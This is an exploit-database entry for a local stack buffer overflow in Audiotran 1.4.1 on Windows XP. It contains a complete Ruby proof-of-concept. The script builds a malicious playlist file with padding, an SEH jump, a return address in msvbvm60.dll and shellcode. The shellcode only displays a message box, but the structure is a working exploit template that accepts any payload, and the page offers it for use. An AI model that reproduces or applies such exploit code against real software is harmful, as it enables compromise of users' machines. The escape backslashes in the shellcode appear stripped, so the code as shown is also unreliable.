Audiotran 1.4.1 Win XP SP2/SP3 English buffer overflow

2010-01-11 / 2010-01-12
Credit: Sbastien Duquette
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!/usr/bin/ruby # # Exploit Title : Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow # Date : January 9th, 2010 # Author : Sbastien Duquette # Software Link : http://www.e-soft.co.uk/Audiotran.htm # Version : 1.4.1 # OS : Windows # Tested on : XP SP2/SP3 En (VMware) # Type of vuln : Stack Overflow / SEH # Greetz to : Corelan Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT/mr_me # # Script provided 'as is', without any warranty. # Use for educational purposes only. # # # banner = "|------------------------------------------------------------------|n" + "| __ __ |n" + "| _________ ________ / /___ _____ / /____ ____ _____ ___ |n" + "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |n" + "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |n" + "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |n" + "| |n" + "| http://www.corelan.be:8800 |n" + "| |n" + "|-------------------------------------------------[ EIP Hunters ]--|nn" # Corelan Team MsgBox payload = "xebx22x56x31xc0x64x8bx40x30x85xc0x78" + "x0cx8bx40x0cx8bx70x1cxadx8bx40x08xeb" + "x09x8bx40x34x8dx40x7cx8bx40x3cx5exc3" + "xebx69x60x8bx6cx24x24x8bx45x3cx8bx54" + "x05x78x01xeax8bx4ax18x8bx5ax20x01xeb" + "xe3x34x49x8bx34x8bx01xeex31xffx31xc0" + "xfcxacx84xc0x74x07xc1xcfx0dx01xc7xeb" + "xf4x3bx7cx24x28x75xe1x8bx5ax24x01xeb" + "x66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8b" + "x01xe8x89x44x24x1cx61xc3xadx50x52xe8" + "xaaxffxffxffx89x07x44x44x44x44x44x44" + "x44x44x47x47x47x47x39xcex75xe6xc3x4c" + "x4cx4cx4cx89xe5xe8x68xffxffxffx89xc2" + "xebx1cx5ex8dx7dx04x89xf1x80xc1x0cxe8" + "xc8xffxffxffxebx15x31xd2x59x88x51x36" + "x51x52xffx54x24x0cxe8xdfxffxffxffx57" + "x7fx29x62xe8xe6xffxffxffx43x6fx72x65" + "x6cx61x6ex20x54x65x61x6dx20x53x68x65" + "x6cx6cx63x6fx64x65x20x2dx20x50x72x6f" + "x67x72x61x6dx20x65x78x70x6cx6fx69x74" + "x65x64x20x73x75x63x65x73x73x66x75x6c" + "x6cx79x58" print banner puts "[+] Exploit for Audiotran 1.4.1." filename = "audiotran_poc.pls" f = File.new(filename, 'w') f.write 'A' * 1308 #padding f.write "xebx06x90x90" f.write "xcbx75x52x73" # ret at 0x735275CB [msvbvm60.dll] f.write payload f.write 'A' * 9000 # padding f.close puts "[+] Wrote exploit file : #{filename}."


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top